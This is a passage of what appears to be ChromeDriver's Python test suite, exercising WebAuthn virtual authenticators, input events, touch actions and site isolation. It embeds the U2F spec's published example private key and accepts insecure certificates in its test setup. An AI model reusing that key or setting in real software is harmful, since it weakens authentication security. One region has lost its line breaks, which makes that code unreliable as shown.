    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/shadow_iframe.html'))
    # Locate the iframe through the shadow root via script; the scrolled
    # container exercises coordinate translation for clicks.
    frame = self._driver.ExecuteScript(
        '''return document.querySelector("#shadow_scroll")
           .shadowRoot.querySelector("iframe")''')
    self._driver.SwitchToFrame(frame)
    message = self._driver.FindElement('css selector', '#message')
    self.assertTrue('clicked' not in message.GetText())
    button = self._driver.FindElement('tag name', 'button')
    button.Click()
    message = self._driver.FindElement('css selector', '#message.result')
    self.assertTrue('clicked' in message.GetText())


class ChromeDriverBackgroundTest(ChromeDriverBaseTestWithWebServer):
  """Tests exercising a driver whose window is in the background."""

  def setUp(self):
    # Two sessions: the second Load pushes _driver1's window behind _driver2's.
    self._driver1 = self.CreateDriver()
    self._driver2 = self.CreateDriver()

  def testBackgroundScreenshot(self):
    # Screenshots must still work for a session that is not foregrounded.
    self._driver2.Load(self._http_server.GetUrl('localhost') +
                       '/chromedriver/empty.html')
    self._driver1.Load(self._http_server.GetUrl('localhost') +
                       '/chromedriver/empty.html')
    screenshotPNGBase64 = self._driver1.TakeScreenshot()
    self.assertIsNotNone(screenshotPNGBase64)


# Tests that require a secure context.
class ChromeDriverSecureContextTest(ChromeDriverBaseTestWithWebServer):
  # The example attestation private key from the U2F spec at
  # https://fidoalliance.org/specs/fido-u2f-v1.2-ps-20170411/fido-u2f-raw-message-formats-v1.2-ps-20170411.html#registration-example
  # PKCS.8 encoded without encryption, as a base64url string.
  privateKey = ("MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQg8_zMDQDYAxlU-Q"
                "hk1Dwkf0v18GZca1DMF3SaJ9HPdmShRANCAASNYX5lyVCOZLzFZzrIKmeZ2jwU"
                "RmgsJYxGP__fWN_S-j5sN4tT15XEpN_7QZnt14YvI6uvAgO0uJEboFaZlOEB")

  @staticmethod
  def GetHttpsUrlForFile(file_path, host=None):
    # HTTPS counterpart of GetHttpUrlForFile; webauthn requires a secure origin.
    return ChromeDriverSecureContextTest._https_server.GetUrl(
        host) + file_path

  # Encodes a string in URL-safe base64 with no padding.
  @staticmethod
  def URLSafeBase64Encode(string):
    # NOTE(review): under Python 3 urlsafe_b64encode returns bytes, so
    # `encoded[-1]` is an int and never equals "=" — padding would not be
    # stripped. Works as intended under Python 2; confirm target interpreter.
    encoded = base64.urlsafe_b64encode(string)
    while encoded[-1] == "=":
      encoded = encoded[0:-1]
    return encoded

  # Decodes a base64 string with no padding.
  @staticmethod
  def UrlSafeBase64Decode(string):
    string = string.encode("utf-8")
    if len(string) % 4 != 0:
      # Restore the padding stripped by URLSafeBase64Encode.
      string += "=" * (4 - len(string) % 4)
    return base64.urlsafe_b64decode(string)

  def setUp(self):
    # MAP * 127.0.0.1 lets us serve https://chromedriver.test locally;
    # insecure certs are accepted because the test server is self-signed.
    self._driver = self.CreateDriver(
        accept_insecure_certs=True,
        chrome_switches=['host-resolver-rules=MAP * 127.0.0.1',
                         'enable-experimental-web-platform-features'])

  def testAddVirtualAuthenticator(self):
    # Full-featured CTAP 2.1 authenticator: resident-key registration with the
    # largeBlob extension must succeed and report usb transport.
    script = """
      let done = arguments[0];
      registerCredential({
        authenticatorSelection: {
          requireResidentKey: true,
        },
        extensions: {
          largeBlob: {
            support: 'preferred',
          },
        },
      }).then(done);
    """
    self._driver.Load(self.GetHttpsUrlForFile(
        '/chromedriver/webauthn_test.html', 'chromedriver.test'))
    self._driver.AddVirtualAuthenticator(
        protocol = 'ctap2_1',
        transport = 'usb',
        hasResidentKey = True,
        hasUserVerification = True,
        isUserConsenting = True,
        isUserVerified = True,
        extensions = ['largeBlob']
    )
    result = self._driver.ExecuteAsyncScript(script)
    self.assertEquals('OK', result['status'])
    self.assertEquals(['usb'], result['credential']['transports'])
    self.assertEquals(True, result['extensions']['largeBlob']['supported'])

  def testAddVirtualAuthenticatorProtocolVersion(self):
    # Every supported protocol string must yield an authenticator ID;
    # anything else is rejected.
    self._driver.Load(self.GetHttpsUrlForFile(
        '/chromedriver/webauthn_test.html', 'chromedriver.test'))
    for protocol in ['ctap1/u2f', 'ctap2', 'ctap2_1']:
      authenticator_id = self._driver.AddVirtualAuthenticator(
          protocol = protocol,
          transport = 'usb',
      )
      self.assertTrue(len(authenticator_id) > 0)
    self.assertRaisesRegexp(
        chromedriver.UnsupportedOperation,
        'INVALID is not a recognized protocol version',
        self._driver.AddVirtualAuthenticator,
        protocol = 'INVALID',
        transport = 'usb')

  def testAddVirtualBadExtensions(self):
    # The extensions argument must be a list of recognized extension names.
    self.assertRaisesRegexp(
        chromedriver.InvalidArgument,
        'extensions must be a list of strings',
        self._driver.AddVirtualAuthenticator,
        protocol = 'ctap2',
        transport = 'usb',
        extensions = 'invalid')
    self.assertRaisesRegexp(
        chromedriver.InvalidArgument,
        'extensions must be a list of strings',
        self._driver.AddVirtualAuthenticator,
        protocol = 'ctap2',
        transport = 'usb',
        extensions = [42])
    self.assertRaisesRegexp(
        chromedriver.UnsupportedOperation,
        'smolBlowbs is not a recognized extension',
        self._driver.AddVirtualAuthenticator,
        protocol = 'ctap2',
        transport = 'usb',
        extensions = ['smolBlowbs'])

  def testAddVirtualAuthenticatorDefaultParams(self):
    # Only protocol and transport are required; defaults must allow a basic
    # registration.
    script = """
      let done = arguments[0];
      registerCredential().then(done);
    """
    self._driver.Load(self.GetHttpsUrlForFile(
        '/chromedriver/webauthn_test.html', 'chromedriver.test'))
    self._driver.AddVirtualAuthenticator(
        protocol = 'ctap1/u2f',
        transport = 'usb',
    )
    result = self._driver.ExecuteAsyncScript(script)
    self.assertEquals('OK', result['status'])
    self.assertEquals(['usb'], result['credential']['transports'])

  def testRemoveVirtualAuthenticator(self):
    self._driver.Load(self.GetHttpsUrlForFile(
        '/chromedriver/webauthn_test.html', 'chromedriver.test'))
    # Removing a non existent virtual authenticator should fail.
    self.assertRaisesRegexp(
        chromedriver.InvalidArgument,
        'Could not find a Virtual Authenticator matching the ID',
        self._driver.RemoveVirtualAuthenticator, 'id')

    # Create an authenticator and try removing it.
    authenticatorId = self._driver.AddVirtualAuthenticator(
        protocol = 'ctap2',
        transport = 'usb',
        hasResidentKey = False,
        hasUserVerification = False,
    )
    self._driver.RemoveVirtualAuthenticator(authenticatorId)

    # Trying to remove the same authenticator should fail.
    self.assertRaisesRegexp(
        chromedriver.InvalidArgument,
        'Could not find a Virtual Authenticator matching the ID',
        self._driver.RemoveVirtualAuthenticator, authenticatorId)

  def testAddCredential(self):
    # A credential injected via AddCredential must be usable for a webauthn
    # assertion from the page.
    script = """
      let done = arguments[0];
      getCredential({
        type: "public-key",
        id: new TextEncoder().encode("cred-1"),
        transports: ["usb"],
      }).then(done);
    """
    self._driver.Load(self.GetHttpsUrlForFile(
        '/chromedriver/webauthn_test.html', 'chromedriver.test'))
    authenticatorId = self._driver.AddVirtualAuthenticator(
        protocol = 'ctap2',
        transport = 'usb',
        hasResidentKey = False,
        hasUserVerification = False,
    )

    # Register a credential and try authenticating with it.
    self._driver.AddCredential(
      authenticatorId = authenticatorId,
      credentialId = self.URLSafeBase64Encode("cred-1"),
      isResidentCredential=False,
      rpId="chromedriver.test",
      privateKey=self.privateKey,
      signCount=1,
    )
    result = self._driver.ExecuteAsyncScript(script)
    self.assertEquals('OK', result['status'])

  def testAddCredentialLargeBlob(self):
    # A resident credential injected with a largeBlob must return that blob
    # when the page asserts with largeBlob.read.
    script = """
      let done = arguments[0];
      getCredential({
        type: "public-key",
        id: new TextEncoder().encode("cred-1"),
        transports: ["usb"],
      }, {
        extensions: {
          largeBlob: {
            read: true,
          },
        },
      }).then(done);
    """
    self._driver.Load(self.GetHttpsUrlForFile(
        '/chromedriver/webauthn_test.html', 'chromedriver.test'))
    authenticatorId = self._driver.AddVirtualAuthenticator(
        protocol = 'ctap2_1',
        transport = 'usb',
        hasResidentKey = True,
        hasUserVerification = True,
        isUserVerified = True,
        extensions = ['largeBlob']
    )

    # Register a credential with a large blob and try reading it.
    self._driver.AddCredential(
      authenticatorId = authenticatorId,
      credentialId = self.URLSafeBase64Encode('cred-1'),
      userHandle = self.URLSafeBase64Encode('erina'),
      largeBlob = self.URLSafeBase64Encode('large blob contents'),
      isResidentCredential = True,
      rpId = "chromedriver.test",
      privateKey = self.privateKey,
      signCount = 1,
    )
    result = self._driver.ExecuteAsyncScript(script)
    self.assertEquals('OK', result['status'])
    self.assertEquals('large blob contents', result['blob'])

  def testAddCredentialBase64Errors(self):
    # Test that AddCredential checks UrlBase64 parameters.
    self._driver.Load(self.GetHttpsUrlForFile(
        '/chromedriver/webauthn_test.html', 'chromedriver.test'))
    authenticatorId = self._driver.AddVirtualAuthenticator(
        protocol = 'ctap2',
        transport = 'usb',
        hasResidentKey = False,
        hasUserVerification = False,
    )

    # Try adding a credentialId that is encoded in vanilla base64.
    self.assertRaisesRegexp(
        chromedriver.InvalidArgument,
        'credentialId must be a base64url encoded string',
        self._driver.AddCredential, authenticatorId, '_0n+wWqg=',
        False, "chromedriver.test", self.privateKey, None, 1,
    )

    # Try adding a credentialId that is not a string.
    self.assertRaisesRegexp(
        chromedriver.InvalidArgument,
        'credentialId must be a base64url encoded string',
        self._driver.AddCredential, authenticatorId, 1,
        False, "chromedriver.test", self.privateKey, None, 1,
    )

  def testGetCredentials(self):
    # Register a resident credential from the page (writing a large blob in
    # the same flow), then verify GetCredentials reports all of its fields.
    script = """
      let done = arguments[0];
      registerCredential({
        authenticatorSelection: {
          requireResidentKey: true,
        },
        extensions: {
          largeBlob: {
            support: "required",
          },
        },
      }).then(attestation => getCredential({
        type: "public-key",
        id: Uint8Array.from(attestation.credential.rawId),
        transports: ["usb"],
      }, {
        extensions: {
          largeBlob: {
            write: new TextEncoder().encode("large blob contents"),
          },
        },
      })).then(done);
    """
    self._driver.Load(self.GetHttpsUrlForFile(
        '/chromedriver/webauthn_test.html', 'chromedriver.test'))
    authenticatorId = self._driver.AddVirtualAuthenticator(
        protocol = 'ctap2_1',
        transport = 'usb',
        hasResidentKey = True,
        hasUserVerification = True,
        isUserVerified = True,
        extensions = ['largeBlob']
    )
    # Register a credential via the webauthn API and set a large blob on it.
    result = self._driver.ExecuteAsyncScript(script)
    self.assertEquals('OK', result['status'])
    self.assertEquals(True, result['extensions']['largeBlob']['written'])
    credentialId = result['attestation']['id']

    # GetCredentials should return the credential that was just created.
    credentials = self._driver.GetCredentials(authenticatorId)
    self.assertEquals(1, len(credentials))
    self.assertEquals(credentialId, credentials[0]['credentialId'])
    self.assertEquals(True, credentials[0]['isResidentCredential'])
    self.assertEquals('chromedriver.test', credentials[0]['rpId'])
    self.assertEquals(chr(1),
                      self.UrlSafeBase64Decode(credentials[0]['userHandle']))
    # One registration + one assertion => signCount of 2.
    self.assertEquals(2, credentials[0]['signCount'])
    self.assertTrue(credentials[0]['privateKey'])
    self.assertEquals('large blob contents',
                      self.UrlSafeBase64Decode(credentials[0]['largeBlob']))

  def testRemoveCredential(self):
    script = """
      let done = arguments[0];
      registerCredential().then(done);
    """
    self._driver.Load(self.GetHttpsUrlForFile(
        '/chromedriver/webauthn_test.html', 'chromedriver.test'))
    authenticatorId = self._driver.AddVirtualAuthenticator(
        protocol = 'ctap2',
        transport = 'usb',
    )

    # Register two credentials.
    result = self._driver.ExecuteAsyncScript(script)
    self.assertEquals('OK', result['status'])
    credential1Id = result['credential']['id']
    result = self._driver.ExecuteAsyncScript(script)
    self.assertEquals('OK', result['status'])
    credential2Id = result['credential']['id']

    # GetCredentials should return both credentials.
    credentials = self._driver.GetCredentials(authenticatorId)
    self.assertEquals(2, len(credentials))

    # Removing the first credential should leave only the second one.
    self._driver.RemoveCredential(authenticatorId, credential1Id)
    credentials = self._driver.GetCredentials(authenticatorId)
    self.assertEquals(1, len(credentials))
    self.assertEquals(credential2Id, credentials[0]['credentialId'])

  def testRemoveAllCredentials(self):
    register_credential_script = """
      let done = arguments[0];
      registerCredential().then(done);
    """
    self._driver.Load(self.GetHttpsUrlForFile(
        '/chromedriver/webauthn_test.html', 'chromedriver.test'))
    authenticatorId = self._driver.AddVirtualAuthenticator(
        protocol = 'ctap2',
        transport = 'usb',
    )
    # Register a credential via the webauthn API.
    result = self._driver.ExecuteAsyncScript(register_credential_script)
    self.assertEquals('OK', result['status'])
    credentialId = result['credential']['rawId']

    # Attempting to register with the credential ID on excludeCredentials
    # should fail.
    exclude_credentials_script = """
      let done = arguments[0];
      registerCredential({
        excludeCredentials: [{
          type: "public-key",
          id: Uint8Array.from(%s),
          transports: ["usb"],
        }],
      }).then(done);
    """ % (credentialId)
    result = self._driver.ExecuteAsyncScript(exclude_credentials_script)
    self.assertEquals("InvalidStateError: The user attempted to register an "
                      "authenticator that contains one of the credentials "
                      "already registered with the relying party.",
                      result['status'])

    # The registration should succeed after clearing the credentials.
    self._driver.RemoveAllCredentials(authenticatorId)
    result = self._driver.ExecuteAsyncScript(exclude_credentials_script)
    self.assertEquals('OK', result['status'])

  def testSetUserVerified(self):
    # Toggling SetUserVerified must control whether UV-required registrations
    # succeed.
    register_uv_script = """
      let done = arguments[0];
      registerCredential({
        authenticatorSelection: {
          userVerification: "required",
        },
      }).then(done);
    """
    self._driver.Load(self.GetHttpsUrlForFile(
        '/chromedriver/webauthn_test.html', 'chromedriver.test'))
    authenticatorId = self._driver.AddVirtualAuthenticator(
        protocol = 'ctap2',
        transport = 'usb',
        hasResidentKey = True,
        hasUserVerification = True,
    )

    # Configure the virtual authenticator to fail user verification.
    self._driver.SetUserVerified(authenticatorId, False)

    # Attempting to register a credential with UV required should fail.
    result = self._driver.ExecuteAsyncScript(register_uv_script)
    self.assertTrue(result['status'].startswith("NotAllowedError"),
                    "Expected %s to be a NotAllowedError" % (result['status']))

    # Trying again after setting userVerified to True should succeed.
    self._driver.SetUserVerified(authenticatorId, True)
    result = self._driver.ExecuteAsyncScript(register_uv_script)
    self.assertEquals("OK", result['status'])


# Tests in the following class are expected to be moved to ChromeDriverTest
# class when we no longer support the legacy mode.
class ChromeDriverW3cTest(ChromeDriverBaseTestWithWebServer):
  """W3C mode specific tests."""

  def setUp(self):
    self._driver = self.CreateDriver(
        send_w3c_capability=True, send_w3c_request=True)

  def testSendKeysToElement(self):
    # Successive SendKeys calls append to the field; the change listener is
    # installed to mirror the production page setup.
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    text = self._driver.ExecuteScript(
        'document.body.innerHTML = \'<input type="text">\';'
        'var input = document.getElementsByTagName("input")[0];'
        'input.addEventListener("change", function() {'
        '  document.body.appendChild(document.createElement("br"));'
        '});'
        'return input;')
    text.SendKeys('0123456789+-*/ Hi')
    text.SendKeys(', there!')
    value = self._driver.ExecuteScript('return arguments[0].value;', text)
    self.assertEquals('0123456789+-*/ Hi, there!', value)

  def testSendKeysToElementDoesNotAppend(self):
    # With the caret explicitly placed at position 0, typed text must land at
    # the caret (start), not be appended, for every textual control type.
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/empty.html'))
    textControlTypes = ["text", "search", "tel", "url", "password"]
    for textType in textControlTypes:
      element = self._driver.ExecuteScript(
          'document.body.innerHTML = '
          '\'<input type="{}" value="send_this_value">\';'
          'var input = document.getElementsByTagName("input")[0];'
          'input.focus();'
          'input.setSelectionRange(0,0);'
          'return input;'.format(textType))
      element.SendKeys('hello')
      value = self._driver.ExecuteScript('return arguments[0].value;', element)
      self.assertEquals('hellosend_this_value', value)

  def testSendKeysToEditableElement(self):
    # Typing into a contentEditable subtree must insert at the focused node.
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/empty.html'))
    element = self._driver.ExecuteScript(
        'document.body.innerHTML = '
        '\'<p contentEditable="true"> <i>hello-></i> '
        '<b>send_this_value </b> </p>\';'
        'var input = document.getElementsByTagName("i")[0];'
        'return input;')
element.SendKeys('hello') self.assertEquals(u'hello->hello', element.GetText()) self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/empty.html')) element = self._driver.ExecuteScript( 'document.body.innerHTML = ' '\'<p contentEditable="true"> <i>hello</i> ' '<b>-></b> </p>\';' 'var input = document.getElementsByTagName("p")[0];' 'input.focus();' 'return input;') element.SendKeys('hello') self.assertEquals(u'hellohello ->', element.GetText()) def testUnexpectedAlertOpenExceptionMessage(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript('window.alert("Hi");') self.assertRaisesRegexp(chromedriver.UnexpectedAlertOpen, '{Alert text : Hi}', self._driver.FindElement, 'tag name', 'divine') # In W3C mode, the alert is dismissed by default. self.assertFalse(self._driver.IsAlertOpen()) class ChromeDriverTestLegacy(ChromeDriverBaseTestWithWebServer): """End to end tests for ChromeDriver in Legacy mode.""" def setUp(self): self._driver = self.CreateDriver(send_w3c_capability=False, send_w3c_request=False) def testContextMenuEventFired(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/context_menu.html')) self._driver.MouseMoveTo(self._driver.FindElement('tag name', 'div')) self._driver.MouseClick(2) self.assertTrue(self._driver.ExecuteScript('return success')) def testDragAndDropWithSVGImage(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/drag_and_drop.svg')) drag = self._driver.FindElement("css selector", "#GreenRectangle") drop = self._driver.FindElement("css selector", "#FolderRectangle") self._driver.MouseMoveTo(drag) self._driver.MouseButtonDown() self._driver.MouseMoveTo(drop) self._driver.MouseButtonUp() self.assertTrue(self._driver.IsAlertOpen()) self.assertEquals('GreenRectangle has been dropped into a folder.', self._driver.GetAlertMessage()) self._driver.HandleAlert(True) self.assertEquals('translate(300,55)', drag.GetAttribute("transform")) def testMouseButtonDownAndUp(self): 
    # (Body of testMouseButtonDownAndUp; the "def" line closes the previous
    # chunk.) mousedown and mouseup handlers each rewrite the div's content,
    # so the presence of <br> / <a> proves which events fired.
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.ExecuteScript(
        'document.body.innerHTML = "<div>old</div>";'
        'var div = document.getElementsByTagName("div")[0];'
        'div.style["width"] = "100px";'
        'div.style["height"] = "100px";'
        'div.addEventListener("mousedown", function() {'
        '  var div = document.getElementsByTagName("div")[0];'
        '  div.innerHTML="new1<br>";'
        '});'
        'div.addEventListener("mouseup", function() {'
        '  var div = document.getElementsByTagName("div")[0];'
        '  div.innerHTML="new2<a></a>";'
        '});')
    self._driver.MouseMoveTo(None, 50, 50)
    self._driver.MouseButtonDown()
    self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
    self._driver.MouseButtonUp()
    self.assertEquals(1, len(self._driver.FindElements('tag name', 'a')))

  def testMouseClick(self):
    # A click on the div fires its "click" handler, which inserts a <br>.
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    div = self._driver.ExecuteScript(
        'document.body.innerHTML = "<div>old</div>";'
        'var div = document.getElementsByTagName("div")[0];'
        'div.style["width"] = "100px";'
        'div.style["height"] = "100px";'
        'div.addEventListener("click", function() {'
        '  var div = document.getElementsByTagName("div")[0];'
        '  div.innerHTML="new<br>";'
        '});'
        'return div;')
    self._driver.MouseMoveTo(div)
    self._driver.MouseClick()
    self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))

  def testMouseDoubleClick(self):
    # Double-click fires the "dblclick" handler, which inserts a <br>.
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    div = self._driver.ExecuteScript(
        'document.body.innerHTML = "<div>old</div>";'
        'var div = document.getElementsByTagName("div")[0];'
        'div.style["width"] = "100px";'
        'div.style["height"] = "100px";'
        'div.addEventListener("dblclick", function() {'
        '  var div = document.getElementsByTagName("div")[0];'
        '  div.innerHTML="new<br>";'
        '});'
        'return div;')
    self._driver.MouseMoveTo(div, 1, 1)
    self._driver.MouseDoubleClick()
    self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))

  def testMouseMoveTo(self):
    # Moving the pointer over the div fires "mouseover", inserting a <br>.
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    div = self._driver.ExecuteScript(
        'document.body.innerHTML = "<div>old</div>";'
        'var div = document.getElementsByTagName("div")[0];'
        'div.style["width"] = "100px";'
        'div.style["height"] = "100px";'
        'div.addEventListener("mouseover", function() {'
        '  var div = document.getElementsByTagName("div")[0];'
        '  div.innerHTML="new<br>";'
        '});'
        'return div;')
    self._driver.MouseMoveTo(div, 10, 10)
    self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))

  def testMoveToElementAndClick(self):
    # This page gets rendered differently depending on which platform the test
    # is running on, and what window size is being used. So we need to do some
    # sanity checks to make sure that the <a> element is split across two lines
    # of text.
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/multiline.html'))

    # Check that link element spans two lines and that the first ClientRect is
    # above the second.
    link = self._driver.FindElements('tag name', 'a')[0]
    client_rects = self._driver.ExecuteScript(
        'return arguments[0].getClientRects();', link)
    self.assertEquals(2, len(client_rects))
    self.assertTrue(client_rects[0]['bottom'] <= client_rects[1]['top'])

    # Check that the center of the link's bounding ClientRect is outside the
    # element.
    bounding_client_rect = self._driver.ExecuteScript(
        'return arguments[0].getBoundingClientRect();', link)
    center = bounding_client_rect['left'] + bounding_client_rect['width'] / 2
    self.assertTrue(client_rects[1]['right'] < center)
    self.assertTrue(center < client_rects[0]['left'])

    self._driver.MouseMoveTo(link)
    self._driver.MouseClick()
    self.assertTrue(self._driver.GetCurrentUrl().endswith('#top'))

  def _FindElementInShadowDom(self, css_selectors):
    """Find an element inside shadow DOM using CSS selectors.
    The last item in css_selectors identify the element to find.
    All preceding selectors identify the hierarchy of shadow hosts
    to traverse in order to reach the target shadow DOM."""
    current = None
    for selector in css_selectors:
      if current is None:
        # First CSS selector, start from root DOM.
        current = self._driver
      else:
        # current is a shadow host selected previously.
        # Enter the corresponding shadow root.
        current = self._driver.ExecuteScript(
            'return arguments[0].shadowRoot', current)
      current = current.FindElement('css selector', selector)
    return current

  def testShadowDomDisplayed(self):
    """Checks that trying to manipulate shadow DOM elements that are detached
    from the document raises a StaleElementReference exception"""
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/shadow_dom_test.html'))
    elem = self._FindElementInShadowDom(
        ["#innerDiv", "#parentDiv", "#button"])
    self.assertTrue(elem.IsDisplayed())
    elem2 = self._driver.FindElement("css selector", "#hostContent")
    self.assertTrue(elem2.IsDisplayed())
    # Hiding the outer host must make the shadow element report not-displayed.
    self._driver.ExecuteScript(
        'document.querySelector("#outerDiv").style.display="None";')
    self.assertFalse(elem.IsDisplayed())

  def testSendingTabKeyMovesToNextInputElement(self):
    # u'\uE004' is the WebDriver key code for Tab: it should move focus from
    # #first to #second between the two typed strings.
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/two_inputs.html'))
    first = self._driver.FindElement('css selector', '#first')
    second = self._driver.FindElement('css selector', '#second')
    first.Click()
    self._driver.SendKeys('snoopy')
    self._driver.SendKeys(u'\uE004')
    self._driver.SendKeys('prickly pete')
    self.assertEquals('snoopy', self._driver.ExecuteScript(
        'return arguments[0].value;', first))
    self.assertEquals('prickly pete', self._driver.ExecuteScript(
        'return arguments[0].value;', second))

  def testSendingTabKeyMovesToNextInputElementEscapedTab(self):
    """This behavior is not specified by the WebDriver standard
    but it is supported by us de facto.
    According to this table
    https://www.w3.org/TR/webdriver/#keyboard-actions
    the code point 0x09 (HT) must be sent to the browser
    via a CompositionEvent.
    We however historically have been sending it as KeyEvent
    with code = ui::VKEY_TAB which leads to focus change.
    For the sake of contrast GeckoDriver and Firefox
    do not show this behavior.
    If in the future it turns out that our current behavior
    is undesirable we can remove this test.
    """
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/two_inputs.html'))
    first = self._driver.FindElement('css selector', '#first')
    second = self._driver.FindElement('css selector', '#second')
    first.Click()
    # The literal '\t' inside the string acts like a Tab key press (see the
    # docstring above), splitting the text between the two inputs.
    self._driver.SendKeys('snoopy\tprickly pete')
    self.assertEquals('snoopy', first.GetProperty('value'))
    self.assertEquals('prickly pete', second.GetProperty('value'))

  def testMobileEmulationDisabledByDefault(self):
    self.assertFalse(self._driver.capabilities['mobileEmulationEnabled'])

  def testSendKeysToElement(self):
    # Legacy-mode twin of ChromeDriverW3cTest.testSendKeysToElement.
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    text = self._driver.ExecuteScript(
        'document.body.innerHTML = \'<input type="text">\';'
        'var input = document.getElementsByTagName("input")[0];'
        'input.addEventListener("change", function() {'
        '  document.body.appendChild(document.createElement("br"));'
        '});'
        'return input;')
    text.SendKeys('0123456789+-*/ Hi')
    text.SendKeys(', there!')
    value = self._driver.ExecuteScript('return arguments[0].value;', text)
    self.assertEquals('0123456789+-*/ Hi, there!', value)

  def testUnexpectedAlertOpenExceptionMessage(self):
    # Unlike W3C mode, the legacy error message carries the full
    # "unexpected alert open:" prefix, and the alert is not auto-dismissed.
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.ExecuteScript('window.alert("Hi");')
    self.assertRaisesRegexp(chromedriver.UnexpectedAlertOpen,
                            'unexpected alert open: {Alert text : Hi}',
                            self._driver.FindElement, 'tag name', 'divine')

  def testTouchScrollElement(self):
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/touch_action_tests.html'))
    scroll_left = 'return document.documentElement.scrollLeft;'
    scroll_top = 'return document.documentElement.scrollTop;'
    self.assertEquals(0, self._driver.ExecuteScript(scroll_left))
    self.assertEquals(0,
                      self._driver.ExecuteScript(scroll_top))
    target = self._driver.FindElement('css selector', '#target')
    self._driver.TouchScroll(target, 47, 53)
    # https://bugs.chromium.org/p/chromedriver/issues/detail?id=1179
    self.assertAlmostEqual(47, self._driver.ExecuteScript(scroll_left), delta=1)
    self.assertAlmostEqual(53, self._driver.ExecuteScript(scroll_top), delta=1)

  def testTouchDoubleTapElement(self):
    # The page logs each touch event into #events for verification.
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/touch_action_tests.html'))
    target = self._driver.FindElement('css selector', '#target')
    target.DoubleTap()
    events = self._driver.FindElement('css selector', '#events')
    self.assertEquals('events: touchstart touchend touchstart touchend',
                      events.GetText())

  def testTouchLongPressElement(self):
    # A long press is reported as touchstart followed by touchcancel.
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/touch_action_tests.html'))
    target = self._driver.FindElement('css selector', '#target')
    target.LongPress()
    events = self._driver.FindElement('css selector', '#events')
    self.assertEquals('events: touchstart touchcancel', events.GetText())

  def testTouchSingleTapElement(self):
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/touch_action_tests.html'))
    target = self._driver.FindElement('css selector', '#target')
    target.SingleTap()
    events = self._driver.FindElement('css selector', '#events')
    self.assertEquals('events: touchstart touchend', events.GetText())


class ChromeDriverSiteIsolation(ChromeDriverBaseTestWithWebServer):
  """Tests for ChromeDriver with the new Site Isolation Chrome feature.

  This feature can be turned on using the --site-per-process flag.

  In order to trick the test into thinking that we are on two separate origins,
  the cross_domain_iframe.html code points to localhost instead of 127.0.0.1.

  Note that Chrome does not allow "localhost" to be passed to --isolate-origins
  for fixable technical reasons related to subdomain matching.
  """

  def setUp(self):
    self._driver = self.CreateDriver(chrome_switches=['--site-per-process'])

  def testCanClickOOPIF(self):
    """Test that you can click into an Out of Process I-Frame (OOPIF).

    Note that the Iframe will not be out-of-process if the correct flags are
    not passed into Chrome.
    """
    if util.GetPlatformName() == 'win':
      # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2198
      # This test is unreliable on Windows, as FindElement can be called too
      # soon, before the child frame is fully loaded. This causes element not
      # found error. Add an implicit wait works around this issue.
      self._driver.SetTimeouts({'implicit': 2000})
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/cross_domain_iframe.html'))
    frame = self._driver.FindElement('tag name', 'iframe')
    self._driver.SwitchToFrame(frame)
    # Wait until the cross-origin child frame has fully loaded before
    # interacting with either frame.
    self.assertTrue(self.WaitForCondition(
        lambda: 'outer.html' in
            self._driver.ExecuteScript('return window.location.href')))
    self.assertTrue(self.WaitForCondition(
        lambda: 'complete' ==
            self._driver.ExecuteScript('return document.readyState')))
    self._driver.SwitchToMainFrame()
    a_outer = self._driver.FindElement('tag name', 'a')
    a_outer.Click()
    frame_url = self._driver.ExecuteScript('return window.location.href')
    self.assertTrue(frame_url.endswith('#one'))
    self._driver.SwitchToFrame(frame)
    a_inner = self._driver.FindElement('tag name', 'a')
    a_inner.Click()
    frame_url = self._driver.ExecuteScript('return window.location.href')
    self.assertTrue(frame_url.endswith('#two'))


class ChromeDriverPageLoadTimeoutTest(ChromeDriverBaseTestWithWebServer):

  class _RequestHandler(object):
    """Test-server handler that withholds its response until released."""

    def __init__(self):
      # Set when the browser's request arrives at the server.
      self.request_received_event = threading.Event()
      # Set by the test to let the pending response go out.
      self.send_response_event = threading.Event()

    def handle(self, request):
      self.request_received_event.set()
      # Don't hang infinitely, 10 seconds are enough.
      self.send_response_event.wait(10)
      self.send_response_event.clear()
      return {'Cache-Control': 'no-store'}, 'Hi!'
